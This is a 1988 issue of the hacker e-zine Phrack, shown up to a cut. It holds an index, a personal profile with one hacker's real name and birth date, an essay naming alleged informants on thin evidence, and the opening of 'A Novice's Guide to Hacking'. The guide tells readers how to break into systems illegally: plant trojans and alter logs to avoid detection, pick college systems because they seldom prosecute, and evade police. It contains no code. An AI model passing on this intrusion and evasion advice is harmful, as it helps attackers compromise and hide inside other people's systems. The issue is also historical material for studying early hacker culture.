Phrack Inc. Volume Two, Issue 22, File 1 of 12 Phrack Inc. Newsletter Issue XXII Index Dec

Master Index Current Directory Index Go to SkepticTank Go to Human Rights activist Keith Henson Go to Scientology cult

Skeptic Tank!

==Phrack Inc.== Volume Two, Issue 22, File 1 of 12 Phrack Inc. Newsletter Issue XXII Index ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ December 23, 1988 Happy Holidays And Welcome To Phrack Inc. Issue XXII! As the golden days of the phreak/hack community fall behind us, it appears that many of the "old elites" have found themselves in highly respected jobs and throughout the course of time, their handles became synonymous with their real names. As the saying goes, "You can't keep a good hacker down," and many of these people are still interested in being a part of the community. In order to help protect the anonymity of these people who are interested in writing for Phrack, we have brought back the concept of ">Unknown User<." This nametag will fill the spot for any author who desires to submit a file, but does not wish for his handle to be seen in the file itself. So if fear of publicity has held you back from submitting an article, don't worry any longer. We here at Phrack Inc. would like to give The Mentor a special commendation for an extremely well written file. The spirit of The Phoenix Project continues within a really decent guide for new hackers. Due to the large amounts of controversy regarding the recent rampage of the InterNet Worm, this issue of Phrack contains a lot of information about the Worm and its effects, the majority of which is scattered within the pages of Phrack World News, but we were also able to get a hold of Bob Page's Report. For anyone who has a legitimate account on MCI Mail, GTE Telemail, or any of the standard Bitnet reachable places, let us know and we can have Phrack delivered to your mailbox. For those of you wishing to submit files to Phrack Inc., please send them to us at our Bitnet accounts or if that is not possible, contact The Mentor on the Phoenix Project BBS (512-441-3088). Once again, its great to be back! Taran King & Knight Lightning C488869@UMCVMB.BITNET & C483307@UMCVMB.BITNET =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This issue contains the following files; 1. Index by Taran King and Knight Lightning 2. Phrack Pro-Phile on Karl Marx by Taran King & Knight Lightning 3. The Judas Contract (Part 2 of the Vicious Circle Trilogy) by KL 4. A Novice's Guide To Hacking (1989 Edition) by The Mentor 5. An Indepth Guide In Hacking Unix by Red Knight 6. Yet Another File On Hacking Unix by >Unknown User< 7. Computer Hackers Follow A Guttman-Like Progression by Richard C. Hollinger 8. A Report On The InterNet Worm by Bob Page 9-12 Phrack World News Issue XXII by Knight Lightning and Taran King _______________________________________________________________________________ ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 2 of 12 ==Phrack Pro-Phile XXII== Created By Taran King Brought To You By Taran King and Knight Lightning Done on October 8, 1988 Welcome to Phrack Pro-Phile XXII. Phrack Pro-Phile was created to bring information to you, the community, about retired or highly important/ controversial people. This issue, we bring to you a name from the past and a user of highly respected rankings in the history of the phreak/hack world... Karl Marx ~~~~~~~~~ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Personal ~~~~~~~~ Handle: Karl Marx Call Him: James Salsman Past Handles: None Handle Origin: Bloom County (Something about Capitalists and Humor) Date Of Birth: 12/2/67 Height: 6"0' Weight: 155 lbs Eye Color: Blue Hair Color: Dark Brown Shoe Size: 10 1/2 Computers: Nondeterministic turing machines Sysop/Co-Sysop Of: Farmers of Doom Origins In Phreak/Hack World: Manufacturing Explosives -- He wanted to blow up his High School. Origins In Phreak/Hack BBSes: Plovernet! People In The Phreak/Hack World Met: The Buccaneer, Mark Tabas, Shadow Master, and a few other Colorado types. He also actually made it to a TAP meeting a while ago [TelePub '86], but he slept through it. All he remembers is that it was in New York and Scan Man was there in a baseball cap. He thinks it was in a "Days Inn" or something. Experience Gained In The Following Ways: Spending long hours pouring over Bell System Tech Journals from 1970-Present. He suggests to anyone who wants to learn non-trivial, but useful things -- or who just wants to get some really *powerful* vocabulary for social engineering -- try using your local college or large public library. Knowledge Attributed To: Nearly everyone who he's ever talked to -- if you let people bullshit you long enough, you learn quite a bit just by figuring out why they are wrong. Memorable Phreak/Hack BBSes: Plovernet, Legion of Doom, Shadowland, and of course the invisible 3rd level of FOD. Work/Schooling (Major): Carnegie Mellon University. He dropped out as soon as they let him work on interesting Cognitive Science and AI projects. He currently works at Expert Technologies -- the company has an expert system for putting together various Yellow Pages for client phone companies that he is not supposed to name (there's no point in naming them, 'cause by now they do every fucking Yellow Pages in the country -- ACK!) But that's just what makes the company money. He's working on user interfaces based on speech recogniton. Conventions/Involvements Outside Of Phone Calls: He thinks he went to that TAP [Telepub '86] meeting, but he doesn't remember much more than Scan Man's cap. He was INTENSELY tired and his girlfreind was complaining that everyone was a geek and that they had to find a way to get back in Pittsburgh in four hours. Accomplishments: He wrote somthing about Nitroglycerin. He probably killed a lot of aspiring phreaks on Plovernet by not putting in enough warnings like "Remember, DON'T make more than a few grams or you will be found dead and identified as Dinty Morre Beef Stew." He also came up with the "RESCOC -- Remote Satellite Course Correction System" file. It was PURE bullshit, but with headings like "How to manuver a satelite to crash it into cities (like Moscow)" it was a big hit with the "Hacker-Hype" media. AT&T denied everything. Phreak/Hack Groups: He got a lot of mail saying somthing like; "Congratulations! You MAY ALREADY HAVE WON membership into the NEW GROUP... ----- THE CAPTAINS OF CODES ----- It's the best new phreak/hack group since MIT! Just tell us everything you know and tell everyone else what a great group we are -- AND WE WILL LET YOU BE A MEMBER OF... ----- THE CAPTAINS OF CODES -----" He usually ignored these "memberships." He believes Tabas understood the problem when he created the parody-group "Farmers of Doom." Interests: His main interest is AI. His particular application domains focus on Cognitive Science and Pattern recognition. He thinks he might have been interested in the telephone system -- but those days are over. He doesn't even remember the codes to do trunk selection on an RTA distribution point. And if the ROCs security folks think he still does that sort of thing they are going to have to prove it. :-) Favorite Things; Thinking: Problem Solving Conversation: Exchange of information Love: Emotional fulfillment Sex: Physical fulfillment Drugs: Introspection Poetry: Metaphor, Imagery Involvement: Sense of Self-Worth Music: Rhythm, Harmonics Food: Flavor, Satisfaction Breathing: Inhalation of Oxygen Most Memorable Experience: The funniest thing that ever happened to him was the time he was arrested. The Secret Service had bugged this hotel room and surprised them (always remember, SECRET service and ROOM service are not *that* different.) They took them to a Denver Police holding tank that was filled with non-sober hooligans. Unfortunately, he was in a business suit (having just returned from handing a $5,000,000.00 "certified" check to Charles Schwab in Sacramento). So there were all these drunk people asking me, "Ahre yha my lawer???" Of course, Mark Tabas had it easy in his Hawaiian print shirt, but he had to deal with "Whatcha here fur?" Jim told them that he was being held for "Fraud." That explanation didn't seem to satisfy them -- "Har, har, har! Fraud! The kid's in here for fraud! Let me tell you what I'm in for! What do you think I'm here for??" He didn't have the heart to tell the gentlemen that he really didn't care why they shared such a predicament so he responded with a blank stare. They then went on to describe crimes so horrible that he could hardly believe them, if it wasn't for the fact that most of them were at least two thirds covered in blood. That sort of gave them the advantage, so he went on to tell them that he must have been put in the wrong cell and that he was sure that the jailer would transfer him in just a few hours. They all seemed to accept that, and went on to insulting each other. Some People To Mention: o "I'd like to thank Who-Bob and T-Bob for their long hours they spent discussing new and innovative ESS social engineering techniques. o I am forever indebted to Mark Tabas for his courage and demeanor in the face of adversity -- which is to say that getting busted didn't bother him as much as disk space problems did. o There's this guy named "Chuck" in the 303 T5 center who I'd like to mention because he set up a RTA routing code for me that switched incoming toll trunks to BLV trunks -- if only everyone were that stupid!" Inside Jokes: "Sorry, sir, we were just trying to find some wire for our science fair project, but as there appears to be nothing here but coffee grounds and cigarette ashes, we had better get going. Have a nice day!" Serious Section: He's very strongly against geting busted. Are Phreaks/Hackers You've Met Generally Computer Geeks? He hopes not! Most of the people that used to be computer geeks around CMU now wear suits and ties and have six digit salaries. What a horrible thing! He wouldn't wish that on his worst enemy! Busted For: He was busted for being in a hotel room with Steve Dahl. He was convicted of the law that says, in effect "it's illegal to lie to somebody more powerful than you." He stopped phreaking because he was on probation and didn't want to go to prison. He is NOT planning a comeback. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Thanks for your time James. Taran King and Knight Lightning _______________________________________________________________________________ ================================================================ ==Phrack Inc.== Volume Two, Issue 22, File 3 of 12 <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> <> <> <> The Judas Contract <> <> ~~~~~~~~~~~~~~~~~~ <> <> Part Two Of The Vicious Circle Trilogy <> <> <> <> An Exploration of The Quisling Syndrome <> <> and <> <> A Look At The Insurrection Of Security Into The Community <> <> <> <> Presented by Knight Lightning <> <> August 7, 1988 <> <> <> <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> The Quisling Syndrome ~~~~~~~~~~~~~~~~~~~~~ Definition: Quisling - (Kwiz/lin) (1) n. Vidkun Quisling (1887 - 1945), Norwegian politician who betrayed his country to the Nazis and became its puppet ruler. (2) n. A traitor. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The "Quisling" Syndrome is rapidly becoming a common occurrence in the less than legal realms of the modem community. In general it starts out with a phreaker or hacker that is either very foolish or inexperienced. He somehow manages to get caught or busted for something and is scared beyond belief about the consequences of his actions. At this point, the law enforcement agency(s) realize that this one bust alone is worthless, especially since the person busted is probably someone who does not know much to begin with and would be a much better asset if he could assist them in grabbing other more experienced and dangerous hackers and phreaks. In exchange for these services the Judas will have his charges dropped or reduced and considering the more than likely parential pressure these Judases will receive, the contract will be fulfilled. Example; Taken from Phrack World News Issue XV; [This exceprt has been edited for this presentation. -KL] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Mad Hatter; Informant? July 31, 1987 ~~~~~~~~~~~~~~~~~~~~~~ We at Phrack Inc. have uncovered a significant amount of information that has led us to the belief that Mad Hatter is an informant for some law enforcement organization. MH had also brought down several disks for the purpose of copying Phantasie Realm. Please note; PR was an IBM program and MH has an apple. Control C told us that when he went to pick MH up at the bus terminal, he watched the bus pull in and saw everyone who disembarked. Suddenly Mad Hatter was there, but not from the bus he was supposed to have come in on. In addition to this, he had baking soda wraped in a five dollar bill that he tried to pass off as cocaine. Perhaps to make us think he was cool or something. MH constantly tried to get left behind at ^C's apartment for unknown reasons. He also was seen at a neighbor's apartment making unauthorized calls into the city of Chicago. When asked who he called, his reply was "Don't worry about it." MH had absolutely no money with him during PartyCon (and incidentally ate everything in ^C's refrigerator) and yet he insisted that although he had taken the bus down and had return trip tickets for the bus, that he would fly back home. How was this going to be achieved? He had no money and even if he could get a refund for the bus tickets, he would still be over $200 short. When asked how he was going to do this, his reply was "Don't worry about it." On Saturday night while on the way to the Hard Rock Cafe, Mad Hatter asked Control C for the location of his computer system and other items 4 times. This is information that Hatter did not need to know, but perhaps a SS agent or someone could use very nicely. When Phrack Inc. discovered that Dan The Operator was an FBI informant and made the news public, several people were criticizing him on Free World II Private. Mad Hatter on the other hand, stood up for Noah and said that he was still his friend despite what had happened. Then later when he realized that people were questioning his legitimacy, his original posts were deleted and he started saying how much he wanted to kill Dan The Operator and that he hated him. Mad Hatter already has admitted to knowing that Dan The Operator was an FBI informant prior to SummerCon '87. He says the reason he didn't tell anyone is because he assumed we already knew. A few things to add; ^*^ Some time ago, Mad Hatter was contacted by AT&T because of an illegal Alliance Teleconference that he was responsible for. There was no bust. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Could this AT&T investigation have been the starting point for Mad Hatter's treason against the phreak/hack community? Is there more to it than that? We may never know the full truth behind this, however we do know that Mad Hatter was not the only one to know Dan The Operator's secret prior to SummerCon '87. The Executioner (who had close ties to TMC Security employees in Omaha, Nebraska) was fully aware of Dan The Operator's motives and intentions in the modem world. There does not always have to be a bust involved for a phreak/hacker to turn Judas, sometimes fear and panic can be a more powerful motivator to become a Quisling. Example; Taken From Phrack World News Issue XV; [This exceprt has been edited for this presentation. -KL] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Crisis On Infinite Hackers July 27, 1987 ~~~~~~~~~~~~~~~~~~~~~~~~~~ It all started on Tuesday, July 21, 1987. Among 30-40 others, Bill From RNOC, Eric NYC, Solid State, Oryan QUEST, Mark Gerardo, The Rebel, and Delta-Master have been busted by the United States Secret Service. There are rumored to be several more members of the more "elite" community busted as well, but since we can neither disprove or prove the validity of these rumors, I have chosen not to name them at this time. One of the offshoots of this investigation is the end of The Lost City of Atlantis and The Lineman's treason against the community he once helped to bring about. In Pennsylvainia, 9 people were busted for credit card fraud. When asked where they learned how to perform the art in which they had been caught, they all responded with the reply of text files from The Lost City Of Atlantis. So, the Secret Service decided to give The Lineman a visit. Lineman, age 16 (a minor) had no charges against him, but he panicked anyway and turned over the bulletin board, all g-philes, and the complete userlog to the Secret Service. This included information from the "Club Board." The final outcome of this action is still on its way. In the meantime, many hackers are preparing for the worst. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The results and consequences from The Lineman's actions were far more severe than they originally appeared. It is highly speculated that The Lineman was in possesion on a very large directory of phreaks/hackers/pirates that he had recently acquired. That list is now in the hands of the government and the Communications Fraud Control Association (as well as in the files of all of the individual security departments of CFCA members). I've seen it and more. The Lineman was able to acquire this list because one phreak stole it from another and then began to trade it to his friends and to others for information and passwords, etc. and what happened from there is such an over exposure and lack of CONTROL that it fell into the wrong and dangerous hands. Acts such as this will with out a doubt eventually lead all of us towards entropy. Captain Caveman, also known as Shawn of Phreakers Quest, began work to help TMC after he was set up by Scan Man during the summer of 1986. However, being busted or feeling panic are still not the only motivations for becoming a Judas. John Maxfield, one of today's best known security consultants, was once a hacker under the handle(s) of Cable Pair and Uncle Tom. He was a member of the Detroit based Corrupt Computing and the original Inner Circle until he was contacted by the FBI and decided that it would be more fun to bust hackers than be one. The following is an excerpt from Phrack World News Issue V; [This article has been edited for this presentation. -KL] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Computer Kids, Or Criminals? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ John Maxfield is a computer security consultant who lives in a downriver suburb. Maxfield spends most of his working hours scanning BBSs, and is known by computer crime experts as a hacker tracker. His investigative work scanning boards has resulted in more prosecutions of computer hackers than anyone else in the field, say sources familiar with his work. Maxfield, who accepts death threats and other scare tactics as part of the job, says the trick is knowing the enemy. Next to his monstrous, homemade computer system, Maxfield boasts the only file on computer hackers that exists. [Not true any longer -KL] It contains several thousand aliases used by hackers, many followed by their real names and home phone numbers. All of it is the result of four years of steady hacker-tracking, says Maxfield. "I've achieved what most hackers would dearly love to achieve," said Maxfield. "Hacking the hacker is the ultimate hack." Maxfield estimates there are currently 50,000 hackers operating in the computer underground and close to 1,000 underground bulletin boards. Of these, he estimates about 200 bulletin boards are "nasty," posting credit card numbers, phone numbers of Fortune 500 corporations, regional phone companies, banks, and even authored tutorials on how to make bombs and explosives. One growing camp of serious hackers is college students, who typically started hacking at 14 and are now into drug trafficking, mainly LSD and cocaine, said Maxfield. Maxfield's operation is called BoardScan. He is paid by major corporations and institutions to gather and provide them with pertinent intelligence about the computer underground. Maxfield also relies on reformed hackers. Letters of thanks from VISA and McDonald's decorate a wall in his office along with an autographed photo of Scottie, the engineer on Star Trek's Starship Enterprise. Often he contacts potential clients about business. "More often I call them and say, I've detected a hacker in your system," said Maxfield. "At that point, they're firmly entrenched. Once the hackers get into your computer, you're in trouble. It's analogous to having roaches or mice in the walls of your house. They don't make their presence known at first. But one day you open the refrigerator door and a handful of roaches drop out." Prior to tracking hackers, Maxfield worked for 20-odd years in the hardware end of the business, installing and repairing computers and phone systems. When the FBI recruited him a few years back to work undercover as a hacker and phone phreak, Maxfield concluded fighting hacker crime must be his mission in life. "So I became the hacker I was always afraid I would become," he said. Maxfield believes the hacker problem is growing more serious. He estimates there were just 400 to 500 hackers in 1982. Every two years, he says, the numbers increase by a factor of 10. Another worrisome trend to emerge recently is the presence of adult computer hackers. Some adults in the computer underground pose as Fagans, a character from a Charles Dickens novel who ran a crime ring of young boys, luring young hackers to their underground crime rings. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - John Freeman Maxfield's BoardScan is also known as the Semco Computer Club and Universial Export, the latter coming from the company name used by the British government in Ian Flemming's James Bond novels and subsequent motion pictures. Another Judas hacker who went on to become a security consultant is the infamous Ian Arthur Murphy of I.A.M. Security. Perhaps he is better known as Captain Zap. The following excerpt is from The Wall Street Journal; [This article has been edited for this presentation. -KL] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - It Takes A Hacker To Catch A Hacker As Well As A Thief November 3, 1987 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Dennis Kneale (Staff Reporter Of The Wall Street Journal) "Computer Hacker Ian [Arthur] Murphy Prowls A Night Beat Tracking Down Other Hackers Who Pirate Data" Capt. Zap actually Ian A. Murphy, is well-known as one of the first convicted computer-hacker thieves. He has since reformed -- he swears it -- and has been resurrected as a consultant, working the other side of the law. CRIME CREDENTIALS Other consultants, many of them graying military vets, try to flush out illicit hackers. But few boast the distinction of being a real hacker -- and one with a felony among his credentials. Capt. Zap is more comfortable at the screen than in a conversation. Asked to name his closest friend, he shakes his head and throws up his hands. He has none. "I don't like people," he says. "They're dreadful." "He's legendary in the hacking world and has access to what's going on. That's a very valuable commodity to us," says Robert P. Campbell of Advanced Information Management in Woodbridge, Va., Mr. Murphy's mentor, who has hired him for consulting jobs. The 30-year-old Mr. Murphy is well-connected into his nocturnal netherworld. Every night till 4 a.m., he walks a beat through some of the hundreds of electronic bulletin boards where hackers swap tales and techniques of computer break-ins. It is very busy these nights. On the Stonehenge bulletin board, "The Marauder" has put up a phone number for Citibank's checking and credit-card records, advising, "Give it a call." On another board, Mr. Murphy finds a primer for rookie "hacklings," written by "The Knights Of Shadow." On yet another he sifts out network codes for the Defense Department's research agency. He watches the boards for clients and warns when a system is under attack. For a fee of $800 a day and up, his firm, IAM/Secure Data Systems Inc., will test the security of a data base by trying to break in, investigate how the security was breached, eavesdrop on anyone you want, and do anything else that strikes his fancy as nerd vs. spy. He says his clients have included Monsanto Co., United Airlines, General Foods Corp., and Peat Marwick. Some probably don't know he worked for them. His felony rap -- not to mention his caustic style -- forces him to work often under a more established consultant. "Ian hasn't grown up yet, but he's technically a brilliant kid," says Lindsey L. Baird, an Army veteran whose firm, Info-Systems Safeguards in Morristown, New Jersey has hired Capt. Zap. Mr. Murphy's electronic voyeurism started early, At age 14, he would sneak into the backyard to tap into the phone switch box and listen to neighbor's calls. (He still eavesdrops now and then.) He quit highschool at age 17. By 19 he was impersonating a student and sneaking into the computer center Temple University to play computer games. EASY TRANSITION From there it was an easy transition to Capt. Zap's role of breaking in and peeking at academic records, credit ratings, a Pentagon list of the sites of missiles aimed at the U.S., and other verboten verbiage. He even left his resume inside Bell of Pennsylvania's computer, asking for a job. The electronic tinkering got him into trouble in 1981. Federal agents swarmed around his parent's home in the wealthy suburb of Gladwyne, Pa. They seized a computer and left an arrest warrant. Capt. Zap was in a ring of eight hackers who ran up $212,000 in long-distance calls by using a "blue box" that mimics phone-company gear. They also ordered $200,000 in hardware by charging it to stolen credit-card numbers and using false mail drops and bogus purchase orders. Mr. Murphy was the leader because "I had the most contempt" for authority, he says. In 1982, he pleaded guilty to receiving stolen goods and was sentenced to 1,000 hours of community service and 2 1/2 years of probation. "It wasn't illegal. It was electronically unethical," he says, unrepentant. "Do you know who likes the phone company?" Who would have a problem with ripping them off?" Mr. Murphy, who had installed commercial air conditioning in an earlier job, was unable to find work after his arrest and conviction. So the hacker became a hack. One day in his cab he picked up a Dun & Bradstreet Corp. manager while he was carrying a printout of hacker instructions for tapping Dun's systems. Thus, he solicited his first consulting assignment: "I think you need to talk to me." He got the job. As a consultant, Mr. Murphy gets to do, legally, the shenanigans that got him into trouble in the first place. "When I was a kid, hacking was fun. Now I can make money at it and still have a lot of fun." - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Now because of all the publicity surrounding our well known friends like Ian Murphy or John Maxfield, some so-called hackers have decided to cash in on news coverage themselves. Perhaps the most well known personality that "sold out" is Bill Landreth aka The Cracker, who is the author of "Out Of The Inner Circle," published by Microsoft Press. The book was definitely more fiction than fact as it tried to make everyone believe that not only did The Cracker form the Inner Circle, but that it was the first group ever created. However, for starters, The Cracker was a second-rate member of Inner Circle II. The publicity from the book may have served to bring him some dollars, but it ultimately focused more negative attention on the community adding to an already intense situation. The Cracker's final story had a little sadder ending... Taken from Phrack World News Issue X; [This article has been edited for this presentation. -KL] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The Cracker Cracks Up? December 21, 1986 ~~~~~~~~~~~~~~~~~~~~~~ "Computer 'Cracker' Is Missing -- Is He Dead Or Is He Alive" ESCONDIDO, Calif. -- Early one morning in late September, computer hacker Bill Landreth pushed himself away from his IBM-PC computer -- its screen glowing with an uncompleted sentence -- and walked out the front door of a friend's home here. He has not been seen or heard from since. The authorities want him because he is the "Cracker", convicted in 1984 of breaking into some of the most secure computer systems in the United States, including GTE Telemail's electronic mail network, where he peeped at NASA Department of Defense computer correspondence. His literary agent wants him because he is Bill Landreth the author, who already has cashed in on the successful publication of one book on computer hacking and who is overdue with the manuscript of a second computer book. The Institute of Internal Auditors wants him because he is Bill Landreth the public speaker who was going to tell the group in a few months how to make their computer systems safer from people like him. The letter, typed into his computer, then printed out and left in his room for someone to discover, touched on the evolution of mankind, prospects for man's immortality and the defeat of the aging process, nuclear war, communism versus capitalism, society's greed, the purpose of life, computers becoming more creative than man and finally -- suicide. The last page reads: "As I am writing this as of the moment, I am obviously not dead. I do, however, plan on being dead before any other humans read this. The idea is that I will commit suicide sometime around my 22nd birthday..." The note explained: "I was bored in school, bored traveling around the country, bored getting raided by the FBI, bored in prison, bored writing books, bored being bored. I will probably be bored dead, but this is my risk to take." But then the note said: "Since writing the above, my plans have changed slightly.... But the point is, that I am going to take the money I have left in the bank (my liquid assets) and make a final attempt at making life worthy. It will be a short attempt, and I do suspect that if it works out that none of my current friends will know me then. If it doesn't work out, the news of my death will probably get around. (I won't try to hide it.)" Landreth's birthday is December 26 and his best friend is not counting on seeing him again. "We used to joke about what you could learn about life, especially since if you don't believe in a God, then there's not much point to life," said Tom Anderson, 16, a senior at San Pasqual High School in Escondido, about 30 miles north of San Diego. Anderson also has been convicted of computer hacking and placed on probation. Anderson was the last person to see Landreth. It was around September 25 -- he does not remember exactly. Landreth had spent a week living in Anderson's home so the two could share Landreth's computer. Anderson's IBM-PC had been confiscated by authorities, and he wanted to complete his own book. Anderson said he and Landreth were also working on a proposal for a movie about their exploits. Apparently Landreth took only his house key, a passport, and the clothes on his back. But concern grew by October 1, when Landreth failed to keep a speaking engagement with a group of auditors in Ohio, for which he would have received $1,000 plus expenses. Landreth may have kept a messy room and poor financial records, but he was reliable enough to keep a speaking engagement, said his friends and literary agent, Bill Gladstone, noting that Landreth's second manuscript was due in August and had not yet been delivered. But, the manuscript never came and Landreth has not reappeared. Steve Burnap, another close friend, said that during the summer Landreth had grown lackadaisical toward life. "He just didn't seem to care much about anything anymore." - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Landreth eventually turned up in Seattle, Washington around the third week of July 1987. Because of his breaking probation, he is back in jail finishing his sentence. Another individual who wanted to publicize himself is Oryan QUEST. Ever since the "Crisis On Infinite Hackers" that occurred on July 21, 1987, QUEST has been "pumping" information to John Markoff -- a reporter for the San Francisco Examiner who now has moved up to the New York Times. Almost t everything Oryan QUEST has told John Markoff are utter and complete lies and false boasts about the powerful things OQ liked to think he could do with a computer. This in itself is harmless, but when it gets printed in newspapers like the New York Times, the general public get a misleading look at the hacker community which can only do us harm. John Markoff has gone on to receive great fame as a news reporter and is now considered a hacker expert -- utterly ridiculous. _______________________________________________________________________________ Infiltration ~~~~~~~~~~~~ One way in which the hacking community is constantly being infiltrated happens on some of today's best known bulletin boards. Boards like Pirate-80 sysoped by Scan Man (who was also working for Telemarketing Company; a telecommunications reseller in Charleston, West Virginia) can be a major problem. On P-80 anyone can get an account if you pay a nominal fee and from there a security consultant just has to start posted supplied information to begin to draw attention and fame as being a super hacker. Eventually he will be asked to join ill-formed groups and start to appear on boards with higher levels of information and blend into the community. After a while he will be beyond suspicion and as such he has successfully entered the phreak/hack world. Dan The Operator was one such agent who acted in this way and would have gone on being undiscovered if not for the events of SummerCon '87 whereafter he was exposed by Knight Lightning and Phrack Inc. :Knight Lightning "The Future Is Forever" =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 4 of 12 +++++++++++++++++++++++++++++++++++++++++++++++++ | The LOD/H Presents | ++++++++++++++++ ++++++++++++++++  A Novice's Guide to Hacking- 1989 edition /  ========================================= /  by /  The Mentor /  Legion of Doom/Legion of Hackers /  /  December, 1988 /  Merry Christmas Everyone! / +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/ The author hereby grants permission to reproduce, redistribute, or include this file in your g-file section, electronic or print newletter, or any other form of transmission that you choose, as long as it is kept intact and whole, with no ommissions, deletions, or changes. (C) The Mentor- Phoenix Project Productions 1988,1989 512/441-3088 Introduction: The State of the Hack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ After surveying a rather large g-file collection, my attention was drawn to the fact that there hasn't been a good introductory file written for absolute beginners since back when Mark Tabas was cranking them out (and almost *everyone* was a beginner!) The Arts of Hacking and Phreaking have changed radically since that time, and as the 90's approach, the hack/phreak community has recovered from the Summer '87 busts (just like it recovered from the Fall '85 busts, and like it will always recover from attempts to shut it down), and the progressive media (from Reality Hackers magazine to William Gibson and Bruce Sterling's cyberpunk fables of hackerdom) is starting to take notice of us for the first time in recent years in a positive light. Unfortunately, it has also gotten more dangerous since the early 80's. Phone cops have more resources, more awareness, and more intelligence than they exhibited in the past. It is becoming more and more difficult to survive as a hacker long enough to become skilled in the art. To this end this file is dedicated. If it can help someone get started, and help them survive to discover new systems and new information, it will have served it's purpose, and served as a partial repayment to all the people who helped me out when was a beginner. Contents ~~~~~~~~ This file will be divided into four parts: Part 1: What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety Part 2: Packet Switching Networks: Telenet- How it Works, How to Use it, Outdials, Network Servers, Private PADs Part 3: Identifying a Computer, How to Hack In, Operating System Defaults Part 4: Conclusion; Final Thoughts, Books to Read, Boards to Call, Acknowledgements Part One: The Basics ~~~~~~~~~~~~~~~~~~~~~ As long as there have been computers, there have been hackers. In the 50's at the Massachusets Institute of Technology (MIT), students devoted much time and energy to ingenious exploration of the computers. Rules and the law were disregarded in their pursuit for the 'hack.' Just as they were enthralled with their pursuit of information, so are we. The thrill of the hack is not in breaking the law, it's in the pursuit and capture of knowledge. To this end, let me contribute my suggestions for guidelines to follow to ensure that not only you stay out of trouble, but you pursue your craft without damaging the computers you hack into or the companies who own them. I. Do not intentionally damage *any* system. II. Do not alter any system files other than ones needed to ensure your escape from detection and your future access (Trojan Horses, Altering Logs, and the like are all necessary to your survival for as long as possible). III. Do not leave your (or anyone else's) real name, real handle, or real phone number on any system that you access illegally. They *can* and will track you down from your handle! IV. Be careful who you share information with. Feds are getting trickier Generally, if you don't know their voice phone number, name, and occupation or haven't spoken with them voice on non-info trading conversations, be wary. V. Do not leave your real phone number to anyone you don't know. This includes logging on boards, no matter how k-rad they seem. If you don't know the sysop, leave a note telling some trustworthy people that will validate you. VI. Do not hack government computers. Yes, there are government systems that are safe to hack, but they are few and far between. And the government has inifitely more time and resources to track you down than a company who has to make a profit and justify expenses. VII. Don't use codes unless there is *NO* way around it (you don't have a local telenet or tymnet outdial and can't connect to anything 800). You use codes long enough, you will get caught. Period. VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law. It doesn't hurt to store everything encrypted on your hard disk, or keep your notes buried in the backyard or in the trunk of your car. You may feel a little funny, but you'll feel a lot funnier when you when you meet Bruno, your transvestite cellmate who axed his family to death. IX. Watch what you post on boards. Most of the really great hackers in the country post *nothing* about the system they're currently working except in the broadest sense (I'm working on a UNIX, or a COSMOS, or something generic. Not "I'm hacking into General Electric's Voice Mail System" or something inane and revealing like that). X. Don't be afraid to ask questions. That's what more experienced hackers are for. Don't expect *everything* you ask to be answered, though. There are some things (LMOS, for instance) that a begining hacker shouldn't mess with. You'll either get caught, or screw it up for others, or both. XI. Finally, you have to actually hack. You can hang out on boards all you want, and you can read all the text files in the world, but until you actually start doing it, you'll never know what it's all about. There's no thrill quite the same as getting into your first system (well, ok, I can thinksavea couple of biggers thrills, but you get the picture). One of the safest places to start your hacking career is on a computer system belonging to a college. University computers have notoriously lax security, and are more used to hackers, as every college computer department ment has one or two, so are less likely to press charges if you should be detected. But the odds of them detecting you and having the personel to committ to tracking you down are slim as long as you aren't destructive. If you are already a college student, this is ideal, as you can legally explore your computer system to your heart's desire, then go out and look for similar systems that you can penetrate with confidence, as you're already familar with them. So if you just want to get your feet wet, call your local college. Many of them will provide accounts for local residents at a nominal (under $20) charge. Finally, if you get caught, stay quiet until you get a lawyer. Don't volunteer any information, no matter what kind of 'deals' they offer you. Nothing is binding unless you make the deal through your lawyer, so you might as well shut up and wait. Part Two: Networks ~~~~~~~~~~~~~~~~~~~ The best place to begin hacking (other than a college) is on one of the bigger networks such as Telenet. Why? First, there is a wide variety of computers to choose from, from small Micro-Vaxen to huge Crays. Second, the networks are fairly well documented. It's easier to find someone who can help you with a problem off of Telenet than it is to find assistance concerning your local college computer or high school machine. Third, the networks are safer. Because of the enormous number of calls that are fielded every day by the big networks, it is not financially practical to keep track of where every call and connection are made from. It is also very easy to disguise your location using the network, which makes your hobby much more secure. Telenet has more computers hooked to it than any other system in the world once you consider that from Telenet you have access to Tymnet, ItaPAC, JANET, DATAPAC, SBDN, PandaNet, THEnet, and a whole host of other networks, all of which you can connect to from your terminal. The first step that you need to take is to identify your local dialup port. This is done by dialing 1-800-424-9494 (1200 